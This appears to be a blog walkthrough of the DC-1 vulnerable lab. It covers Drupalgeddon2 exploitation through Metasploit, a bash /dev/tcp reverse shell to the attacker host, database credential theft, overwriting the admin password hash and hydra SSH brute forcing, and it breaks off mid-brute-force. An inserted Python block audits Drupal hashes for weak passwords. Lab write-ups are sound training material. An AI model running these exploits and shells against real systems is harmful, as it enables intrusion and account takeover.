Lluna's Pure land.

What is life like when singing to wine?

DC-1

0x00. Official description

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

0x01. Start with nmap

We can see that .1 is the gateway, .2 is the host machine and .6 is Kali, so .3 must be our target.

root@JIYE:~/tmp/DC1# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0019s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00027s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00027s latency).
MAC Address: 00:0C:29:45:E3:65 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/tmp/DC1# ls
nmap.sP

0x02. Continue with nmap to scan services and ports

Ports 22/80/111/41087 are open.

root@JIYE:~/tmp/DC1# nmap -A 192.168.1.3 -p 1-65535 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:19 EDT
Nmap scan report for 192.168.1.3
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36531/tcp6 status
| 100024 1 41087/tcp status
| 100024 1 48070/udp6 status
|_ 100024 1 50997/udp status
41087/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:45:E3:65 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.1.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.37 seconds

0x03. Since ports 22 and 80 were found, we can consider brute-forcing or simply visiting the site

Let's visit it first.

It looks like a CMS; a quick look at the wiki confirms it is an open-source CMS written in PHP 😜

0x04. Next, run a directory scan against the site

robots.txt is found. This file tells crawlers which paths not to index, so its contents are usually exactly the paths the site owner would rather not have seen.

root@JIYE:~/tmp/DC1# dirb http://192.168.1.3 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 07:38:44 2020
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.3/ ----
+ http://192.168.1.3/0 (CODE:200|SIZE:7564)
+ http://192.168.1.3/admin (CODE:403|SIZE:7652)
+ http://192.168.1.3/Admin (CODE:403|SIZE:7497)
+ http://192.168.1.3/ADMIN (CODE:403|SIZE:7497)
+ http://192.168.1.3/batch (CODE:403|SIZE:7787)
+ http://192.168.1.3/cgi-bin/ (CODE:403|SIZE:287)
==> DIRECTORY: http://192.168.1.3/includes/
+ http://192.168.1.3/index.php (CODE:200|SIZE:7564)
+ http://192.168.1.3/install.mysql (CODE:403|SIZE:292)
+ http://192.168.1.3/install.pgsql (CODE:403|SIZE:292)
+ http://192.168.1.3/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.1.3/misc/
==> DIRECTORY: http://192.168.1.3/modules/
+ http://192.168.1.3/node (CODE:200|SIZE:7564)
==> DIRECTORY: http://192.168.1.3/profiles/
+ http://192.168.1.3/README (CODE:200|SIZE:5376)
+ http://192.168.1.3/robots (CODE:200|SIZE:1561)
+ http://192.168.1.3/robots.txt (CODE:200|SIZE:1561)
+ http://192.168.1.3/Root (CODE:403|SIZE:283)
==> DIRECTORY: http://192.168.1.3/scripts/
+ http://192.168.1.3/search (CODE:403|SIZE:7500)
+ http://192.168.1.3/Search (CODE:403|SIZE:7500)
+ http://192.168.1.3/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.1.3/sites/
==> DIRECTORY: http://192.168.1.3/themes/
+ http://192.168.1.3/user (CODE:200|SIZE:7417)
+ http://192.168.1.3/web.config (CODE:200|SIZE:2178)
+ http://192.168.1.3/xmlrpc.php (CODE:200|SIZE:42)
......

Browsing around, UPGRADE.txt can be found.

Opening UPGRADE.txt shows that this CMS is version 7.x.

A quick Baidu search shows it has an RCE vulnerability.

0x05. Get shell

1. Being an msf-all-the-way kind of person, I go straight to msf

root@JIYE:~/tmp/DC1# msfconsole -q
msf5 > search drupal

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf5 >

2. Since it is a 2018 vulnerability, use number 4, the Forms API property injection, and get a meterpreter shell straight away

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

Name: Drupal Drupalgeddon 2 Forms API Property Injection
Module: exploit/unix/webapp/drupal_drupalgeddon2
Platform: PHP, Unix, Linux
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-03-28

Provided by:
Jasper Mattsson
a2u
Nixawk
FireFart
wvu <wvu@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host

Payload information:
Avoid: 3 characters

Description:
This module exploits a Drupal property injection in the Forms API.
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
vulnerable.

References:
https://cvedetails.com/cve/CVE-2018-7600/
https://www.drupal.org/sa-core-2018-002
https://greysec.net/showthread.php?tid=2912
https://research.checkpoint.com/uncovering-drupalgeddon-2/
https://github.com/a2u/CVE-2018-7600
https://github.com/nixawk/labs/issues/19
https://github.com/FireFart/CVE-2018-7600

Also known as:
SA-CORE-2018-002
Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.3
rhosts => 192.168.1.3
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.1.6
lhost => 192.168.1.6
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload
set payload generic/custom set payload php/bind_php set payload php/meterpreter/bind_tcp_uuid
set payload generic/shell_bind_tcp set payload php/bind_php_ipv6 set payload php/meterpreter/reverse_tcp
set payload generic/shell_reverse_tcp set payload php/download_exec set payload php/meterpreter/reverse_tcp_uuid
set payload multi/meterpreter/reverse_http set payload php/exec set payload php/meterpreter_reverse_tcp
set payload multi/meterpreter/reverse_https set payload php/meterpreter/bind_tcp set payload php/reverse_perl
set payload php/bind_perl set payload php/meterpreter/bind_tcp_ipv6 set payload php/reverse_php
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] Sending stage (38288 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.3:52082) at 2020-08-20 08:50:40 -0400

meterpreter >

3. Check the user's privileges and try to escalate, but there is no getsystem 🙃

meterpreter > getuid 
Server username: www-data (33)
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter >

Since there are 5 flags to find, let's look at the files first

meterpreter > pwd
/var/www
meterpreter > ls
Listing: /var/www
=================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 174 fil 2013-11-20 15:45:59 -0500 .gitignore
100644/rw-r--r-- 5767 fil 2013-11-20 15:45:59 -0500 .htaccess
100644/rw-r--r-- 1481 fil 2013-11-20 15:45:59 -0500 COPYRIGHT.txt
100644/rw-r--r-- 1451 fil 2013-11-20 15:45:59 -0500 INSTALL.mysql.txt
100644/rw-r--r-- 1874 fil 2013-11-20 15:45:59 -0500 INSTALL.pgsql.txt
100644/rw-r--r-- 1298 fil 2013-11-20 15:45:59 -0500 INSTALL.sqlite.txt
100644/rw-r--r-- 17861 fil 2013-11-20 15:45:59 -0500 INSTALL.txt
100755/rwxr-xr-x 18092 fil 2013-11-01 06:14:15 -0400 LICENSE.txt
100644/rw-r--r-- 8191 fil 2013-11-20 15:45:59 -0500 MAINTAINERS.txt
100644/rw-r--r-- 5376 fil 2013-11-20 15:45:59 -0500 README.txt
100644/rw-r--r-- 9642 fil 2013-11-20 15:45:59 -0500 UPGRADE.txt
100644/rw-r--r-- 6604 fil 2013-11-20 15:45:59 -0500 authorize.php
100644/rw-r--r-- 720 fil 2013-11-20 15:45:59 -0500 cron.php
100644/rw-r--r-- 52 fil 2019-02-19 08:20:46 -0500 flag1.txt
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 includes
100644/rw-r--r-- 529 fil 2013-11-20 15:45:59 -0500 index.php
100644/rw-r--r-- 703 fil 2013-11-20 15:45:59 -0500 install.php
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 misc
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 modules
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 profiles
100644/rw-r--r-- 1561 fil 2013-11-20 15:45:59 -0500 robots.txt
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 scripts
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 sites
40755/rwxr-xr-x 4096 dir 2013-11-20 15:45:59 -0500 themes
100644/rw-r--r-- 19941 fil 2013-11-20 15:45:59 -0500 update.php
100644/rw-r--r-- 2178 fil 2013-11-20 15:45:59 -0500 web.config
100644/rw-r--r-- 417 fil 2013-11-20 15:45:59 -0500 xmlrpc.php

meterpreter >

4. flag1.txt found; let's see whether we have permission to read it

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter >

We can read it, but where is the next flag??? According to the hint, every good CMS needs a config file, and so do you... 😥

Look at the site's config file: it is an XML file with nothing useful in it!

meterpreter > cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<!-- Don't show directory listings for URLs which map to a directory. -->
<directoryBrowse enabled="false" />
<rewrite>
<rules>
<rule name="Protect files and directories from prying eyes" stopProcessing="true">
<match url="\.(engine|inc|info|install|make|module|profile|test|po|sh|.*sql|theme|tpl(\.php)?|xtmpl)$|^(\..*|Entries.*|Repository|Root|Tag|Template)$" />
<action type="CustomResponse" statusCode="403" subStatusCode="0" statusReason="Forbidden" statusDescription="Access is forbidden." />
</rule>
<rule name="Force simple error message for requests for non-existent favicon.ico" stopProcessing="true">
<match url="favicon\.ico" />
<action type="CustomResponse" statusCode="404" subStatusCode="1" statusReason="File Not Found" statusDescription="The requested file favicon.ico was not found" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
</conditions>
</rule>
<!-- Rewrite URLs of the form 'x' to the form 'index.php?q=x'. -->
<rule name="Short URLs" stopProcessing="true">
<match url="^(.*)$" ignoreCase="false" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
<add input="{URL}" pattern="^/favicon.ico$" ignoreCase="false" negate="true" />
</conditions>
<action type="Rewrite" url="index.php?q={R:1}" appendQueryString="true" />
</rule>
</rules>
</rewrite>

<httpErrors>
<remove statusCode="404" subStatusCode="-1" />
<error statusCode="404" prefixLanguageFilePath="" path="/index.php" responseMode="ExecuteURL" />
</httpErrors>

<defaultDocument>
<!-- Set the default document -->
<files>
<remove value="index.php" />
<add value="index.php" />
</files>
</defaultDocument>
</system.webServer>
</configuration>

meterpreter >

Change of approach: since this is a web application there must be a database, and the database password will be written in plaintext in a config file.

After some painful searching, it turns up in sites/default/settings.php

flag2 and its hint are there too: brute force and dictionary attacks aren't the only way into the system, but you can give them a try

meterpreter > cat settings.php
<?php

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

0x06. Log in to the database

Since meterpreter cannot log in to mysql itself, drop into a regular shell; 3306 is open and only accepts local connections

meterpreter > shell
Process 3903 created.
Channel 7 created.
netstat -apntu
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:41087 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.3:52082 192.168.1.6:4444 ESTABLISHED 3837/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::36531 :::* LISTEN -
tcp6 1 0 192.168.1.3:80 192.168.1.6:40931 CLOSE_WAIT -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:49260 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:783 0.0.0.0:* -
udp 0 0 127.0.0.1:815 0.0.0.0:* -
udp 0 0 0.0.0.0:50997 0.0.0.0:* -
udp6 0 0 :::48070 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::62200 :::* -
udp6 0 0 :::783 :::* -

Trying to log in, it turns out that this is not possible from the current shell

mysql -udbuser -pR0ck3t

Since this shell was set up over HTTP and is not a persistent connection, let's establish a persistent connection next

0x07. Reverse shell

Since a persistent connection is needed, try sending DC1's shell back to Kali

1. Kali listens on port 6666 first

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...

2. On DC1, execute

bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

Huh, an error 😱 try another way

meterpreter > shell
Process 3911 created.
Channel 8 created.
bash -i >& /dev/tcp/192.168.1.6/6666 0>&1
/bin/sh: 2: Syntax error: Bad fd numbermeterpreter >
meterpreter >

/bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

That doesn't work either, ugh

meterpreter > shell
Process 3915 created.
Channel 10 created.
/bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1
meterpreter >

Yet another method: use a Python one-liner to spawn an interactive shell first, then send that shell back to Kali

python -c 'import pty;pty.spawn("/bin/bash")'

This time it works; an interactive shell is established

meterpreter > shell
Process 3924 created.
Channel 12 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ /bin/bash -i >& /dev/tcp/192.168.1.6/6666 0>&1

3. The shell comes back

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 51322
www-data@DC-1:/var/www$

With the reverse shell working, log in to mysql again

0x08. Log in to mysql again

However, in the shell sent back to Kali it is not possible to log in to mysql (ugh, what is the reason for this??????)

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.3] 51322
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t

But in the interactive shell obtained with the Python one-liner, login works; this noob is left with a face full of question marks ❓❓❓❓❓❓❓❓❓ (I went around in a full circle...)

meterpreter > shell
Process 3960 created.
Channel 16 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 16035
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

1. List the databases

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)

mysql>

2. Select drupaldb and list its tables

mysql> use drupaldb     
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)

mysql>

80 tables is a bit much! The users table stands out

3. Look at the users table

mysql> select * from users\G  // \G prints each row vertically instead of as a table
select * from users\G
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
3 rows in set (0.00 sec)

mysql>

The CMS admin user's password hash is visible. flag2 hinted earlier that brute force is not the only way, so take a different approach

4. Overwrite the admin password

Overwrite the original password with a new, manually generated password hash

Use PHP to run scripts/password-hash.sh and generate the hash for the password admin

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin      
php scripts/password-hash.sh admin

password: admin hash: $S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27

www-data@DC-1:/var/www$

Overwrite it

update users set pass="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;

mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> update users set pass="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;
<s="$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27" where uid=1;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0

mysql>
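To see what the hash just written into the users table actually encodes, here is an added example (not code from the original post, and not Drupal's own PHP): a Python re-implementation of the Drupal 7 $S$ scheme from includes/password.inc (SHA-512 iterated 2^count times over salt+password, then phpass-style base64, truncated to 55 characters), used the way a defender would use it, to check whether a stored hash corresponds to a known-weak password such as the admin/admin set above. PAGE_HASH is the hash generated on this page; the candidate deny-list is constructed.

```python
import hashlib
from typing import Iterable, Optional

# Alphabet Drupal 7 inherited from phpass for its custom base64 encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55              # stored $S$ hashes are truncated to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30    # Drupal 7 bounds on the iteration exponent

# Hash produced by `php scripts/password-hash.sh admin` on the page above.
PAGE_HASH = "$S$D4KjoV1PUSBjXtqmjsUaVuRE4TrPc8iY2F.KYKPn.qzT7vbfsg27"


def _phpass_base64(data: bytes) -> str:
    """phpass base64: 3 bytes -> 4 chars, little-endian bit order, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> Optional[str]:
    """Re-derive a $S$ hash from `password` and the 12-char setting prefix
    ($S$ + one iteration-exponent char + 8-char salt) of a stored hash."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])      # 'D' -> 15 -> 2^15 rounds
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):          # 2^count_log2 further rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _phpass_base64(digest))[:HASH_LENGTH]


def check_password(password: str, stored_hash: str) -> bool:
    """True if `password` reproduces `stored_hash` (Drupal 7 $S$ hashes only)."""
    if not stored_hash.startswith("$S$") or len(stored_hash) != HASH_LENGTH:
        return False
    return drupal7_crypt(password, stored_hash) == stored_hash


def weak_password_audit(stored_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that matches the stored hash, else None.
    Meant for checking your own users table against a short deny-list."""
    for cand in candidates:
        if check_password(cand, stored_hash):
            return cand
    return None


if __name__ == "__main__":
    # Constructed deny-list of passwords that should never be accepted.
    hit = weak_password_audit(PAGE_HASH, ["password", "123456", "admin"])
    print("weak password in use:", hit)
```

The salt and iteration count are self-describing in the first 12 characters, which is why a single stored row is enough to re-check it.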

0x09. Log in to the CMS

Log in with admin/admin

Login successful

Clicking the Dashboard reveals flag3

Click flag3

The clue points to passwd, so look at passwd

www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
www-data@DC-1:/var/www$

At the very end there is flag4, with /bin/bash as its shell, so it can log in; port 22 was found open earlier

Next, brute-force it

root@JIYE:~/tmp/DC1# hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.3 ssh -vV -f -o hydra.ssh
...... // -l username, -P wordlist, -vV print every attempt, -f stop once a valid password is found, -o output file
......
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "delta" - 137 of 3562 [child 2] (0/3)
[ATTEMPT] target 192.168.1.3 - login "flag4" - pass "doctor" - 138 of 3562 [child 8] (0/3)
